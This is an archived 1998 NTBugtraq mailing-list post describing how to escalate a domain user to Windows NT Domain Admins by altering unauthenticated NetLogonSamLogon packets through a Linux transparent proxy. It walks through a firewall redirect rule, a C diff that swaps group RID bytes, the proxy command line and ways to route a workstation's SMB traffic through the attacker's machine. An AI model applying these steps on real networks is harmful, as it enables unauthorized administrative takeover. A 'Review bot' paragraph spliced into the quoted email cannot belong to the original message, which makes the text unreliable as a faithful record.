Gaining Domain Admins access on LAN (fwd)

From: Weld Pond (weldat_private)
Date: Wed Jan 28 1998 - 12:07:52 PST


    ---------- Forwarded message ----------
    Date: Wed, 28 Jan 1998 13:35:00 +0000
    From: Paul Ashton <paulat_private>
    To: NTBUGTRAQat_private
    Subject: Gaining Domain Admins access on LAN
    
    Quite a while ago when publishing the NT domain authentication
    protocol, I mentioned that the contents of the NetLogonSamLogon
    packet were unauthenticated.
    
    Recently I have been using Linux's transparent proxy support to
    do things like transparently filter outgoing access to port 80
    through the Linux firewall via the junkbuster privacy program
    (cookie removal etc.) and the squid web cache.
    
    It turns out that changing the NetLogonSamLogon packet using
    transparent proxy support is trivial. No need to bother with
    recalculating TCP checksums etc.
    
    Here's what you need to do if you want to change your domain
    group DOMGRP1 (let's say it's RID 0x03F3) to Domain Admins, RID
    0x0200.
    
    Get transproxy-0.3 from http://www.nlc.net.au/
    Make sure your Linux kernel has been compiled with transparent
    proxy support.
    
    Install the following firewall rule:-
    
    ipfwadm -I -a accept -P tcp -D 0/0 139 -r 150
    
    This will redirect attempts to connect to port 139 to the local
    port 150.
    
    Start the transparent proxy daemon on port 150 that will modify
    the contents of MS RPCs that go through it.
    
    Modify tproxy.c with the following diff:
    *** tproxy.c    Wed Jan 28 14:17:31 1998
    --- orgtproxy.c Mon Jan 26 20:14:46 1998
    ***************
    *** 795,814 ****
                                    return;
    
                            default:
    -                               {
    -                               int i;
    -                               unsigned char oldgroup[8] = {0xf3,0x03,0,0,7,0,0,0};
    -                               unsigned char newgroup[8] = {0x00,0x02,0,0,7,0,0,0};
    -
    -                               for (i = 0; i < read_len-8; i++)
    -                                       if (!memcmp(headers+i, oldgroup, 8))
    -                                               memcpy(headers+i,newgroup,8);
                                    if (write(sock, headers, read_len) < 0)
                                    {
                                            syslog(LOG_WARNING, "write(client) failed: %m");
                                            close(proxy);
                                            return;
    -                               }
                                    }
                                    break;
                            }
    --- 795,805 ----
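
    Review bot: the file order in this context diff is reversed (the
    modified tproxy.c is the `***` side and the original orgtproxy.c
    is the `---` side), so the nine `-` lines are in fact the
    additions that make up the change; a reader applying it with
    `patch` needs to reverse it or swap the headers. On the substance
    of those lines: the match is a raw `memcmp` over the whole read
    buffer (`headers`) with no RPC or SMB parsing, so any 8-byte run
    equal to `oldgroup` is rewritten regardless of where it sits in
    the stream, and a pattern that straddles two `read` calls is not
    seen at all; the closing note in the message ("will change all
    occurrences ... anywhere in a TCP 139 packet") is exactly this
    limitation and would be clearer stated next to the code.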
    
    Compile and run:
    ./tproxy -t -s 150 -r nobody pdchost 139
    
    pdchost is the name or IP address of a PDC or BDC which you wish
    to authenticate to.
    
    Convince your workstation to send SMB TCP/139 stuff through your
    linux firewall. You can do this in various ways such as setting
    default routes, physically interposing the linux firewall between
    the workstation and the rest of the network, responding to netbios
    name queries using Samba, creating your own DHCP server, etc.
    
    For the purposes of this test I changed the IP address of the
    workstation and set the default route to be the Linux server.
    
    CTL-ALT-DEL and log in as a user in DOMGRP1 and voila, you now have
    domain admin rights.
    
    I don't think SMB signing will protect this because the connection
    to the RPC named pipe is done as a null session. But I haven't
    tried it.
    
    Run this at your own peril. The group substitution will change
    all occurrences of the listed 8 bytes (RID+attributes) anywhere
    in a TCP 139 packet.
    
    Paul
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:41:09 PDT